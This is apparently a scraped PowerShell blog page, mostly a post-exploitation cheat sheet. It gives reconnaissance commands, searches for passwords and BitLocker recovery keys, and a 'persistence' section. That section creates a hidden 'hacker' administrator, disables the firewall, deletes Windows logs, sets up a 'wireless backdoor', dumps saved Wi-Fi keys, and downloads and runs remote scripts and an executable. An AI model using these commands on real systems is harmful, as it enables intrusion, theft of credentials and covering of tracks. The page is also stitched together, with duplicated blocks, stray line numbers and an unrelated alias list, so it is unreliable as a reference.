$query="Select * from Win32_Registry"; Get-WMIObject -Query $query

$query="Select * from Win32_SCSIController"; Get-WMIObject -Query $query

$query="Select * from Win32_PerfRawData_PerfNet_Server"; Get-WMIObject -Query $query

$query="Select * from Win32_Service"; Get-WMIObject -Query $query

$query="Select * from Win32_ShadowCopy"; Get-WMIObject -Query $query

$query="Select * from Win32_ShadowStorage"; Get-WMIObject -Query $query

$query="Select * from Win32_Share"; Get-WMIObject -Query $query

$query="Select * from Win32_SoftwareElement"; Get-WMIObject -Query $query

$query="Select * from Win32_SoftwareFeature"; Get-WMIObject -Query $query

$query="Select * from WIN32_SoundDevice"; Get-WMIObject -Query $query

$query="Select * from Win32_StartupCommand"; Get-WMIObject -Query $query

$query="Select * from Win32_SystemAccount"; Get-WMIObject -Query $query

$query="Select * from Win32_SystemDriver"; Get-WMIObject -Query $query

$query="Select * from Win32_SystemEnclosure"; Get-WMIObject -Query $query

$query="Select * from Win32_SystemSlot"; Get-WMIObject -Query $query

$query="Select * from Win32_TapeDrive"; Get-WMIObject -Query $query

$query="Select * from Win32_TemperatureProbe"; Get-WMIObject -Query $query

$query="Select * from Win32_TimeZone"; Get-WMIObject -Query $query

$query="Select * from Win32_UninterruptiblePowerSupply"; Get-WMIObject -Query $query

$query="Select * from Win32_UserAccount"; Get-WMIObject -Query $query

$query="Select * from Win32_VoltageProbe"; Get-WMIObject -Query $query

$query="Select * from Win32_Volume"; Get-WMIObject -Query $query

$query="Select * from Win32_VolumeQuotaSetting"; Get-WMIObject -Query $query

$query="Select * from Win32_VolumeUserQuota"; Get-WMIObject -Query $query

$query="Select * from Win32_WMISetting"; Get-WMIObject -Query $query

Networking

#Network Adaptor information contains, manufacturer, MAC ID etc
Get-WmiObject -Class win32_networkadapter

#Hardware information of the network adapter
Get-NetAdapterHardwareInfo

#Returns all physical network adapters
Get-NetAdapter -Physical

#Networking statistics from the network adapter. The statistics include broadcast, multicast, discards, and errors
Get-NetAdapterStatistics

#Get the current MAC
Get-NetAdapter | Select-Object Name,MacAddress
Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress

#Neighbor cache entries (The neighbor cache maintains information for each on-link neighbor, including the IP address and the associated link-layer address. In IPv4, the neighbor cache is commonly known as the Address Resolution Protocol (ARP) cache)
Get-NetNeighbor

#Get the current IP address
Get-NetIPAddress | Select-Object InterfaceAlias,IPAddress
Get-NetIPAddress -AddressFamily ipv4
Get-NetIPAddress -AddressFamily ipv6
Get-NetIPConfiguration

#Information about firewall
Get-NetFirewallAddressFilter
Get-NetFirewallApplicationFilter
Get-NetFirewallInterfaceFilter
Get-NetFirewallInterfaceTypeFilter
Get-NetFirewallPortFilter
Get-NetFirewallProfile
Get-NetFirewallRule
Get-NetFirewallSecurityFilter
Get-NetFirewallServiceFilter
Get-NetFirewallSetting

#List Firewall Rules
#Direction: Inbound
Get-NetFirewallRule | Where {$_.Direction –eq ‘Inbound’}

#TCP
Get-NetTCPConnection
Get-NetTCPConnection | Select-Object LocalPort,Remoteport

#UDP
Get-NetUDPEndpoint
(Get-NetUDPEndpoint).LocalPort

#Information about DNS
Get-DnsClient
Get-DnsClientCache
Get-DnsClientGlobalSetting
Get-DnsClientNrptGlobal
Get-DnsClientNrptPolicy
Get-DnsClientNrptRule
Get-DnsClientServerAddress

#Displays your currently shared SMB entries
Get-SmbShare
Get-WmiObject -Class Win32_Share

#Access a Router
$user="admin"
$pass="admin123"
$pair="${user}:${pass}"
$bytes=[System.Text.Encoding]::ASCII.GetBytes($pair)
$base64=[System.Convert]::ToBase64String($bytes)
$basicAuthValue="Basic $base64"
$headers=@{Authorization=$basicAuthValue}
$url='https://192.168.1.1:89/rpSys.html'
$result=(Invoke-WebRequest -Uri $url -Headers $headers)
($result.AllElements | Where tagName -eq “title”).outerText

#Connect to Access Point
$user="admin"
$pass="1234"
$pair="${user}:${pass}"
$bytes=[System.Text.Encoding]::ASCII.GetBytes($pair)
$base64=[System.Convert]::ToBase64String($bytes)
$basicAuthValue="Basic $base64"
$headers=@{Authorization=$basicAuthValue}
$url='https://192.168.1.2/index.asp'
$result=(Invoke-WebRequest -Uri $url -Headers $headers)
($result.AllElements | Where tagName -eq “title”).outerText

#Network Adaptor information contains, manufacturer, MAC ID etc

Get-WmiObject -Class win32_networkadapter

#Hardware information of the network adapter

Get-NetAdapterHardwareInfo

#Returns all physical network adapters

Get-NetAdapter -Physical

#Networking statistics from the network adapter. The statistics include broadcast, multicast, discards, and errors

Get-NetAdapterStatistics

#Get the current MAC

Get-NetAdapter | Select-Object Name,MacAddress

Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress

#Neighbor cache entries (The neighbor cache maintains information for each on-link neighbor, including the IP address and the associated link-layer address. In IPv4, the neighbor cache is commonly known as the Address Resolution Protocol (ARP) cache)

Get-NetNeighbor

#Get the current IP address

Get-NetIPAddress | Select-Object InterfaceAlias,IPAddress

Get-NetIPAddress -AddressFamily ipv4

Get-NetIPAddress -AddressFamily ipv6

Get-NetIPConfiguration

#Information about firewall

Get-NetFirewallAddressFilter

Get-NetFirewallApplicationFilter

Get-NetFirewallInterfaceFilter

Get-NetFirewallInterfaceTypeFilter

Get-NetFirewallPortFilter

Get-NetFirewallProfile

Get-NetFirewallRule

Get-NetFirewallSecurityFilter

Get-NetFirewallServiceFilter

Get-NetFirewallSetting

#List Firewall Rules

#Direction: Inbound

Get-NetFirewallRule | Where {$_.Direction –eq ‘Inbound’}

#TCP

Get-NetTCPConnection

Get-NetTCPConnection | Select-Object LocalPort,Remoteport

#UDP

Get-NetUDPEndpoint

(Get-NetUDPEndpoint).LocalPort

#Information about DNS

Get-DnsClient

Get-DnsClientCache

Get-DnsClientGlobalSetting

Get-DnsClientNrptGlobal

Get-DnsClientNrptPolicy

Get-DnsClientNrptRule

Get-DnsClientServerAddress

#Displays your currently shared SMB entries

Get-SmbShare

Get-WmiObject -Class Win32_Share

#Access a Router

$user="admin"

$pass="admin123"

$pair="${user}:${pass}"

$bytes=[System.Text.Encoding]::ASCII.GetBytes($pair)

$base64=[System.Convert]::ToBase64String($bytes)

$basicAuthValue="Basic $base64"

$headers=@{Authorization=$basicAuthValue}

$url='https://192.168.1.1:89/rpSys.html'

$result=(Invoke-WebRequest -Uri $url -Headers $headers)

($result.AllElements | Where tagName -eq “title”).outerText

#Connect to Access Point

$user="admin"

$pass="1234"

$pair="${user}:${pass}"

$bytes=[System.Text.Encoding]::ASCII.GetBytes($pair)

$base64=[System.Convert]::ToBase64String($bytes)

$basicAuthValue="Basic $base64"

$headers=@{Authorization=$basicAuthValue}

$url='https://192.168.1.2/index.asp'

$result=(Invoke-WebRequest -Uri $url -Headers $headers)

($result.AllElements | Where tagName -eq “title”).outerText

Users

#List your current user 
[System.Security.Principal.WindowsIdentity]::GetCurrent() 
([System.Security.Principal.WindowsIdentity]::GetCurrent()).name

#Remote user
Get-WmiObject win32_computersystem -property username -ComputerName RemoteComputer

#List local users
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
$adsi.Children | Where-Object {$_.SchemaClassName -eq 'user'} | Select-Object Name

#List local groups
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
$adsi.Children | Where-Object {$_.SchemaClassName -eq 'group'} | Select-Object name

#Information about user accounts
Get-WmiObject -Class Win32_UserAccount
Get-WmiObject -Class Win32_Account

#Information about group accounts
Get-WmiObject -Class Win32_Group

#List your current user

[System.Security.Principal.WindowsIdentity]::GetCurrent()

([System.Security.Principal.WindowsIdentity]::GetCurrent()).name

#Remote user

Get-WmiObject win32_computersystem -property username -ComputerName RemoteComputer

#List local users

$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"

$adsi.Children | Where-Object {$_.SchemaClassName -eq 'user'} | Select-Object Name

#List local groups

$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"

$adsi.Children | Where-Object {$_.SchemaClassName -eq 'group'} | Select-Object name

#Information about user accounts

Get-WmiObject -Class Win32_UserAccount

Get-WmiObject -Class Win32_Account

#Information about group accounts

Get-WmiObject -Class Win32_Group

Configs

#Services
Get-Service

#Print the contents of the Windows hosts file
Get-Content $env:windir\System32\drivers\etc\hosts

#Services

Get-Service

#Print the contents of the Windows hosts file

Get-Content $env:windir\System32\drivers\etc\hosts

Finding important files

#Gets the items in one or more specified locations
Get-ChildItem

#Recursively searches for files with a “.txt” extension in the C:\temp directory. The contents of any files matching this criteria are then searched for the term “password”
Get-ChildItem c:\temp -Filter *.txt -Recurse | Select-String password

#Searching file “TeamViewer”
Get-ChildItem c:\ -rec -ea SilentlyContinue | ForEach-Object {
Select-String "TeamViewer" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches
}

#Searching IP adresses in text files
Write-Host "IP addresses:`n"
Get-ChildItem C:\Users\ -rec -ea SilentlyContinue | ForEach-Object {
Select-String "\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches | ForEach-Object {($_.matches)|Select-Object Value}
}

#Searching BitLocker recovery keys
#Searching content “Clave de recuperación de Cifrado de unidad BitLocker”
Get-ChildItem C:\Users\juan -rec -ea SilentlyContinue | ForEach-Object {
Select-String "Clave de recuperación de Cifrado de unidad BitLocker" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches
}

#Gets the items in one or more specified locations

Get-ChildItem

#Recursively searches for files with a “.txt” extension in the C:\temp directory. The contents of any files matching this criteria are then searched for the term “password”

Get-ChildItem c:\temp -Filter *.txt -Recurse | Select-String password

#Searching file “TeamViewer”

Get-ChildItem c:\ -rec -ea SilentlyContinue | ForEach-Object {

Select-String "TeamViewer" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches

}

#Searching IP adresses in text files

Write-Host "IP addresses:`n"

Get-ChildItem C:\Users\ -rec -ea SilentlyContinue | ForEach-Object {

Select-String "\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches | ForEach-Object {($_.matches)|Select-Object Value}

}

#Searching BitLocker recovery keys

#Searching content “Clave de recuperación de Cifrado de unidad BitLocker”

Get-ChildItem C:\Users\juan -rec -ea SilentlyContinue | ForEach-Object {

Select-String "Clave de recuperación de Cifrado de unidad BitLocker" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches

}

Files to pull

#Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size 
Get-ChildItem $env:SystemDrive\pagefile.sys

#Prefetch files
Get-ChildItem $env:SystemRoot\Prefetch

#Portion of accessed file list within prefetch file for PowerShell.exe
Get-Content $env:SystemRoot\Prefetch\POWERSHELL_ISE.EXE-85BC6AB4.pf

#File contains the registry settings
Get-ChildItem $env:windir\System32\config -Force

#File contains the registry settings for their individual account
Get-ChildItem $env:USERPROFILE\NTUSER.DAT

#This file contains the mappings of IP addresses to host names
Get-ChildItem $env:windir\System32\drivers\etc\hosts
Get-Content $env:windir\System32\drivers\etc\hosts

#Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size

Get-ChildItem $env:SystemDrive\pagefile.sys

#Prefetch files

Get-ChildItem $env:SystemRoot\Prefetch

#Portion of accessed file list within prefetch file for PowerShell.exe

Get-Content $env:SystemRoot\Prefetch\POWERSHELL_ISE.EXE-85BC6AB4.pf

#File contains the registry settings

Get-ChildItem $env:windir\System32\config -Force

#File contains the registry settings for their individual account

Get-ChildItem $env:USERPROFILE\NTUSER.DAT

#This file contains the mappings of IP addresses to host names

Get-ChildItem $env:windir\System32\drivers\etc\hosts

Get-Content $env:windir\System32\drivers\etc\hosts

Remote system access

#Determines whether all elements of the path exist
Test-Path \\192.168.1.56\datos

#Gets the items in one or more specified locations
Get-ChildItem \\192.168.1.56\datos

#Creates a new Server Message Block (SMB) share
New-SmbShare -Name fso -Path F:\power
 
#Creates a new Server Message Block share and add permissions
New-SmbShare -Name fso -Path F:\power –FullAccess administrador -ReadAccess Everyone

#Enable remote desktop
powershell Start-Process powershell_ise -Verb runAs
Set-Location HKLM:\
$RegKey ='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\'
Set-ItemProperty -Path $RegKey -Name fDenyTSConnections -Value 0

#View installed programs on remote machine
$credencial=Get-Credential
1..254 | %{
('192.168.1.'+$_)
if(Test-Connection ('192.168.1.'+$_) -Quiet)
{
Get-WmiObject -Class Win32_Product -ComputerName ('192.168.1.'+$_) -Credential $credencial
}
}

#Determines whether all elements of the path exist

Test-Path \\192.168.1.56\datos

#Gets the items in one or more specified locations

Get-ChildItem \\192.168.1.56\datos

#Creates a new Server Message Block (SMB) share

New-SmbShare -Name fso -Path F:\power

#Creates a new Server Message Block share and add permissions

New-SmbShare -Name fso -Path F:\power –FullAccess administrador -ReadAccess Everyone

#Enable remote desktop

powershell Start-Process powershell_ise -Verb runAs

Set-Location HKLM:\

$RegKey ='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\'

Set-ItemProperty -Path $RegKey -Name fDenyTSConnections -Value 0

#View installed programs on remote machine

$credencial=Get-Credential

1..254 | %{

('192.168.1.'+$_)

if(Test-Connection ('192.168.1.'+$_) -Quiet)

{

Get-WmiObject -Class Win32_Product -ComputerName ('192.168.1.'+$_) -Credential $credencial

}

Software

#Gets a list of the app packages that are installed in a user profile
Get-AppxPackage

#Returns a list of all software packages that have been installed by using Package Management
Get-Package

#Gets a list of the app packages that are installed in a user profile

Get-AppxPackage

#Returns a list of all software packages that have been installed by using Package Management

Get-Package

AutoStart directories

Get-ChildItem $env:SystemDrive\'ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\' -Force

1	Get-ChildItem $env:SystemDrive\'ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\' -Force

Persistance This section focuses on gaining a foothold to regain, or reobtain access to a system through means of authentication, backdoors, etc.. Download

#Transfer one or more files between a client computer and a server
Start-BitsTransfer https://www.jesusninoc.com/vir.exe

1 2	#Transfer one or more files between a client computer and a server Start-BitsTransfer https://www.jesusninoc.com/vir.exe

Compress or expand ZIP archive

#Creates a new zipped (or compressed) archive file from one or more specified files or folders
Compress-Archive -LiteralPath C:\powershell\example.txt –CompressionLevel Optimal -DestinationPath C:\powershell\comprimido.zip

#Extracts files from a specified archive (zipped) file
Expand-Archive -LiteralPath C:\powershell\comprimido.zip -DestinationPath C:\powershell\descomprimir

#Creates a new zipped (or compressed) archive file from one or more specified files or folders

Compress-Archive -LiteralPath C:\powershell\example.txt –CompressionLevel Optimal -DestinationPath C:\powershell\comprimido.zip

#Extracts files from a specified archive (zipped) file

Expand-Archive -LiteralPath C:\powershell\comprimido.zip -DestinationPath C:\powershell\descomprimir

Reg command exit

#List
Set-Location HKLM:\
Get-ChildItem

#PowerShell execution policy
Set-Location HKLM:\
Set-Location \SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\
Get-ChildItem

#Searching the registry “TeamViewer”
Get-ChildItem HKCU:\ -rec -ea SilentlyContinue | ForEach-Object {
Select-String "TeamViewer" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches

#Searching the registry: URL
Get-ChildItem HKCU:\ -rec -ea SilentlyContinue | ForEach-Object {
Select-String "\b(ht|f)tp(s?)[^ ]*\.[^ ]*(\/[^ ]*)*\b" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches | ForEach-Object {($_.matches)|Select-Object Value}
}

#List

Set-Location HKLM:\

Get-ChildItem

#PowerShell execution policy

Set-Location HKLM:\

Set-Location \SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\

Get-ChildItem

#Searching the registry “TeamViewer”

Get-ChildItem HKCU:\ -rec -ea SilentlyContinue | ForEach-Object {

Select-String "TeamViewer" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches

#Searching the registry: URL

Get-ChildItem HKCU:\ -rec -ea SilentlyContinue | ForEach-Object {

Select-String "\b(ht|f)tp(s?)[^ ]*\.[^ ]*(\/[^ ]*)*\b" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches | ForEach-Object {($_.matches)|Select-Object Value}

}

Deleting logs

Remove-Item $env:windir\*.log

1	Remove-Item $env:windir\*.log

Uninstalling software “Antivirus”

Uninstall-Package

1	Uninstall-Package

Invasive or altering commands

#Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
$ComputerName = $env:COMPUTERNAME
$computer = [ADSI]"WinNT://$($ComputerName),computer"
$Name = 'hacker'
$user = $computer.Create('User', "$($Name)")
$password = 'hacker'
$user.SetPassword($password)
$user.SetInfo()

#Creates a new group
$ComputerName = $env:COMPUTERNAME
$computer = [ADSI]"WinNT://$($ComputerName),computer"
$Name = 'hackers'
$user = $computer.Create('Group', "$($Name)")
$user.SetInfo()

#Add a user to a group
$ComputerName = $env:COMPUTERNAME
$nombregrupo='administradores'
$group = [ADSI]"WinNT://$($Computername)/$($nombregrupo),group" 
$user = 'hacker'
$group.add("WinNT://$($user),user")

#Registers a scheduled task definition on a local computer
Register-ScheduledTask Task01 -Action (New-ScheduledTaskAction -Execute "Cmd") -Principal (New-ScheduledTaskPrincipal -GroupId "BUILTIN\administradores" -RunLevel Highest) -Settings (New-ScheduledTaskSettingsSet -RestartCount 5 -RestartInterval 60)

#Creates a new Server Message Block (SMB) share
New-SmbShare -Name fso -Path F:\power
 
#Creates a new Server Message Block share and add permissions
New-SmbShare -Name fso -Path F:\power –FullAccess administrador -ReadAccess Everyone

#Modify hosts file
Get-Content $env:windir\System32\drivers\etc\hosts
Add-Content $env:windir\System32\drivers\etc\hosts "127.0.0.1 jesusninoc.com"

#Download and execute a remote script
powershell Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config.ps1;
powershell -File $env:TEMP\config.ps1

#Download and execute a remote script (No changes the user preference for the Windows PowerShell execution policy)
powershell Start-Process powershell_ise -Verb runAs
$script=Invoke-WebRequest 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt'
Invoke-Expression $script

#Proxy configuration
netsh winhttp import proxy source=ie

#Disable the Microsoft Windows Firewall
netsh advfirewall set allprofiles state off

#Creating a wireless backdoor
netsh wlan set host mode=allow ssid=WLAN_AA key=123ASBB@@
netsh wlan start host

#Wireless password
(netsh wlan show profile | Select-String "Perfil de todos los usuarios") | %{
[String]$SSID=$_
$SSID=$SSID.Split(":")[1].trim()
$SSID
netsh wlan show profile name=$SSID key=clear | Select-String 'Contenido de la clave'
}

#Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’

$ComputerName = $env:COMPUTERNAME

$computer = [ADSI]"WinNT://$($ComputerName),computer"

$Name = 'hacker'

$user = $computer.Create('User', "$($Name)")

$password = 'hacker'

$user.SetPassword($password)

$user.SetInfo()

#Creates a new group

$ComputerName = $env:COMPUTERNAME

$computer = [ADSI]"WinNT://$($ComputerName),computer"

$Name = 'hackers'

$user = $computer.Create('Group', "$($Name)")

$user.SetInfo()

#Add a user to a group

$ComputerName = $env:COMPUTERNAME

$nombregrupo='administradores'

$group = [ADSI]"WinNT://$($Computername)/$($nombregrupo),group"

$user = 'hacker'

$group.add("WinNT://$($user),user")

#Registers a scheduled task definition on a local computer

Register-ScheduledTask Task01 -Action (New-ScheduledTaskAction -Execute "Cmd") -Principal (New-ScheduledTaskPrincipal -GroupId "BUILTIN\administradores" -RunLevel Highest) -Settings (New-ScheduledTaskSettingsSet -RestartCount 5 -RestartInterval 60)

#Creates a new Server Message Block (SMB) share

New-SmbShare -Name fso -Path F:\power

#Creates a new Server Message Block share and add permissions

New-SmbShare -Name fso -Path F:\power –FullAccess administrador -ReadAccess Everyone

#Modify hosts file

Get-Content $env:windir\System32\drivers\etc\hosts

Add-Content $env:windir\System32\drivers\etc\hosts "127.0.0.1 jesusninoc.com"

#Download and execute a remote script

powershell Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config.ps1;

powershell -File $env:TEMP\config.ps1

#Download and execute a remote script (No changes the user preference for the Windows PowerShell execution policy)

powershell Start-Process powershell_ise -Verb runAs

$script=Invoke-WebRequest 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt'

Invoke-Expression $script

#Proxy configuration

netsh winhttp import proxy source=ie

#Disable the Microsoft Windows Firewall

netsh advfirewall set allprofiles state off

#Creating a wireless backdoor

netsh wlan set host mode=allow ssid=WLAN_AA key=123ASBB@@

netsh wlan start host

#Wireless password

(netsh wlan show profile | Select-String "Perfil de todos los usuarios") | %{

[String]$SSID=$_

$SSID=$SSID.Split(":")[1].trim()

$SSID

netsh wlan show profile name=$SSID key=clear | Select-String 'Contenido de la clave'

}

Filesystem PowerShell

Eliminar ficheros que contienen una cadena

27/04/201619/03/2016

Get-ChildItem D:\prueba | %{if(Get-Content $_.FullName | Select-String "borrar"){Remove-Item $_.FullName -WhatIf}}

1	Get-ChildItem D:\prueba \| %{if(Get-Content $_.FullName \| Select-String "borrar"){Remove-Item $_.FullName -WhatIf}}

Filesystem PowerShell

Eliminar archivos modificados en el último día

15/02/201613/02/2016

Get-ChildItem | Where-Object {$_.LastWriteTime -ge (Get-Date).AddDays(-1)} | Remove-Item

1	Get-ChildItem \| Where-Object {$_.LastWriteTime -ge (Get-Date).AddDays(-1)} \| Remove-Item

PowerShell Processes Services

Windows PowerShell aliases

16/06/201506/11/2015

Alias % -> ForEach-Object
Alias ? -> Where-Object
Alias ac -> Add-Content
Alias asnp -> Add-PSSnapIn
Alias cat -> Get-Content
Alias cd -> Set-Location
Alias chdir -> Set-Location
Alias clc -> Clear-Content
Alias clear -> Clear-Host
Alias clhy -> Clear-History
Alias cli -> Clear-Item
Alias clp -> Clear-ItemProperty
Alias cls -> Clear-Host
Alias clv -> Clear-Variable
Alias cnsn -> Connect-PSSession
Alias compare -> Compare-Object
Alias copy -> Copy-Item
Alias cp -> Copy-Item
Alias cpi -> Copy-Item
Alias cpp -> Copy-ItemProperty
Alias curl -> Invoke-WebRequest
Alias cvpa -> Convert-Path
Alias dbp -> Disable-PSBreakpoint
Alias del -> Remove-Item
Alias diff -> Compare-Object
Alias dir -> Get-ChildItem
Alias dnsn -> Disconnect-PSSession
Alias ebp -> Enable-PSBreakpoint
Alias echo -> Write-Output
Alias epal -> Export-Alias
Alias epcsv -> Export-Csv
Alias epsn -> Export-PSSession
Alias erase -> Remove-Item
Alias etsn -> Enter-PSSession
Alias exsn -> Exit-PSSession
Alias fc -> Format-Custom
Alias fl -> Format-List
Alias foreach -> ForEach-Object
Alias ft -> Format-Table
Alias fw -> Format-Wide
Alias gal -> Get-Alias
Alias gbp -> Get-PSBreakpoint
Alias gc -> Get-Content
Alias gci -> Get-ChildItem
Alias gcm -> Get-Command
Alias gcs -> Get-PSCallStack
Alias gdr -> Get-PSDrive
Alias ghy -> Get-History
Alias gi -> Get-Item
Alias gjb -> Get-Job
Alias gl -> Get-Location
Alias gm -> Get-Member
Alias gmo -> Get-Module
Alias gp -> Get-ItemProperty
Alias gps -> Get-Process
Alias gpv -> Get-ItemPropertyValue
Alias group -> Group-Object
Alias gsn -> Get-PSSession
Alias gsnp -> Get-PSSnapIn
Alias gsv -> Get-Service
Alias gu -> Get-Unique
Alias gv -> Get-Variable
Alias gwmi -> Get-WmiObject
Alias h -> Get-History
Alias history -> Get-History
Alias icm -> Invoke-Command
Alias iex -> Invoke-Expression
Alias ihy -> Invoke-History
Alias ii -> Invoke-Item
Alias ipal -> Import-Alias
Alias ipcsv -> Import-Csv
Alias ipmo -> Import-Module
Alias ipsn -> Import-PSSession
Alias irm -> Invoke-RestMethod
Alias ise -> powershell_ise.exe
Alias iwmi -> Invoke-WMIMethod
Alias iwr -> Invoke-WebRequest
Alias kill -> Stop-Process
Alias lp -> Out-Printer
Alias ls -> Get-ChildItem
Alias man -> help
Alias md -> mkdir
Alias measure -> Measure-Object
Alias mi -> Move-Item
Alias mount -> New-PSDrive
Alias move -> Move-Item
Alias mp -> Move-ItemProperty
Alias mv -> Move-Item
Alias nal -> New-Alias
Alias ndr -> New-PSDrive
Alias ni -> New-Item
Alias nmo -> New-Module
Alias npssc -> New-PSSessionConfigurationFile
Alias nsn -> New-PSSession
Alias nv -> New-Variable
Alias ogv -> Out-GridView
Alias oh -> Out-Host
Alias popd -> Pop-Location
Alias ps -> Get-Process
Alias pushd -> Push-Location
Alias pwd -> Get-Location
Alias r -> Invoke-History
Alias rbp -> Remove-PSBreakpoint
Alias rcjb -> Receive-Job
Alias rcsn -> Receive-PSSession
Alias rd -> Remove-Item
Alias rdr -> Remove-PSDrive
Alias ren -> Rename-Item
Alias ri -> Remove-Item
Alias rjb -> Remove-Job
Alias rm -> Remove-Item
Alias rmdir -> Remove-Item
Alias rmo -> Remove-Module
Alias rni -> Rename-Item
Alias rnp -> Rename-ItemProperty
Alias rp -> Remove-ItemProperty
Alias rsn -> Remove-PSSession
Alias rsnp -> Remove-PSSnapin
Alias rujb -> Resume-Job
Alias rv -> Remove-Variable
Alias rvpa -> Resolve-Path
Alias rwmi -> Remove-WMIObject
Alias sajb -> Start-Job
Alias sal -> Set-Alias
Alias saps -> Start-Process
Alias sasv -> Start-Service
Alias sbp -> Set-PSBreakpoint
Alias sc -> Set-Content
Alias select -> Select-Object
Alias set -> Set-Variable
Alias shcm -> Show-Command
Alias si -> Set-Item
Alias sl -> Set-Location
Alias sleep -> Start-Sleep
Alias sls -> Select-String
Alias sort -> Sort-Object
Alias sp -> Set-ItemProperty
Alias spjb -> Stop-Job
Alias spps -> Stop-Process
Alias spsv -> Stop-Service
Alias start -> Start-Process
Alias sujb -> Suspend-Job
Alias sv -> Set-Variable
Alias swmi -> Set-WMIInstance
Alias tee -> Tee-Object
Alias trcm -> Trace-Command
Alias type -> Get-Content
Alias wget -> Invoke-WebRequest
Alias where -> Where-Object
Alias wjb -> Wait-Job
Alias write -> Write-Output

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

Alias % -> ForEach-Object

Alias ? -> Where-Object

Alias ac -> Add-Content

Alias asnp -> Add-PSSnapIn

Alias cat -> Get-Content

Alias cd -> Set-Location

Alias chdir -> Set-Location

Alias clc -> Clear-Content

Alias clear -> Clear-Host

Alias clhy -> Clear-History

Alias cli -> Clear-Item

Alias clp -> Clear-ItemProperty

Alias cls -> Clear-Host

Alias clv -> Clear-Variable

Alias cnsn -> Connect-PSSession

Alias compare -> Compare-Object

Alias copy -> Copy-Item

Alias cp -> Copy-Item

Alias cpi -> Copy-Item

Alias cpp -> Copy-ItemProperty

Alias curl -> Invoke-WebRequest

Alias cvpa -> Convert-Path

Alias dbp -> Disable-PSBreakpoint

Alias del -> Remove-Item

Alias diff -> Compare-Object

Alias dir -> Get-ChildItem

Alias dnsn -> Disconnect-PSSession

Alias ebp -> Enable-PSBreakpoint

Alias echo -> Write-Output

Alias epal -> Export-Alias

Alias epcsv -> Export-Csv

Alias epsn -> Export-PSSession

Alias erase -> Remove-Item

Alias etsn -> Enter-PSSession

Alias exsn -> Exit-PSSession

Alias fc -> Format-Custom

Alias fl -> Format-List

Alias foreach -> ForEach-Object

Alias ft -> Format-Table

Alias fw -> Format-Wide

Alias gal -> Get-Alias

Alias gbp -> Get-PSBreakpoint

Alias gc -> Get-Content

Alias gci -> Get-ChildItem

Alias gcm -> Get-Command

Alias gcs -> Get-PSCallStack

Alias gdr -> Get-PSDrive

Alias ghy -> Get-History

Alias gi -> Get-Item

Alias gjb -> Get-Job

Alias gl -> Get-Location

Alias gm -> Get-Member

Alias gmo -> Get-Module

Alias gp -> Get-ItemProperty

Alias gps -> Get-Process

Alias gpv -> Get-ItemPropertyValue

Alias group -> Group-Object

Alias gsn -> Get-PSSession

Alias gsnp -> Get-PSSnapIn

Alias gsv -> Get-Service

Alias gu -> Get-Unique

Alias gv -> Get-Variable

Alias gwmi -> Get-WmiObject

Alias h -> Get-History

Alias history -> Get-History

Alias icm -> Invoke-Command

Alias iex -> Invoke-Expression

Alias ihy -> Invoke-History

Alias ii -> Invoke-Item

Alias ipal -> Import-Alias

Alias ipcsv -> Import-Csv

Alias ipmo -> Import-Module

Alias ipsn -> Import-PSSession

Alias irm -> Invoke-RestMethod

Alias ise -> powershell_ise.exe

Alias iwmi -> Invoke-WMIMethod

Alias iwr -> Invoke-WebRequest

Alias kill -> Stop-Process

Alias lp -> Out-Printer

Alias ls -> Get-ChildItem

Alias man -> help

Alias md -> mkdir

Alias measure -> Measure-Object

Alias mi -> Move-Item

Alias mount -> New-PSDrive

Alias move -> Move-Item

Alias mp -> Move-ItemProperty

Alias mv -> Move-Item

Alias nal -> New-Alias

Alias ndr -> New-PSDrive

Alias ni -> New-Item

Alias nmo -> New-Module

Alias npssc -> New-PSSessionConfigurationFile

Alias nsn -> New-PSSession

Alias nv -> New-Variable

Alias ogv -> Out-GridView

Alias oh -> Out-Host

Alias popd -> Pop-Location

Alias ps -> Get-Process

Alias pushd -> Push-Location

Alias pwd -> Get-Location

Alias r -> Invoke-History

Alias rbp -> Remove-PSBreakpoint

Alias rcjb -> Receive-Job

Alias rcsn -> Receive-PSSession

Alias rd -> Remove-Item

Alias rdr -> Remove-PSDrive

Alias ren -> Rename-Item

Alias ri -> Remove-Item

Alias rjb -> Remove-Job

Alias rm -> Remove-Item

Alias rmdir -> Remove-Item

Alias rmo -> Remove-Module

Alias rni -> Rename-Item

Alias rnp -> Rename-ItemProperty

Alias rp -> Remove-ItemProperty

Alias rsn -> Remove-PSSession

Alias rsnp -> Remove-PSSnapin

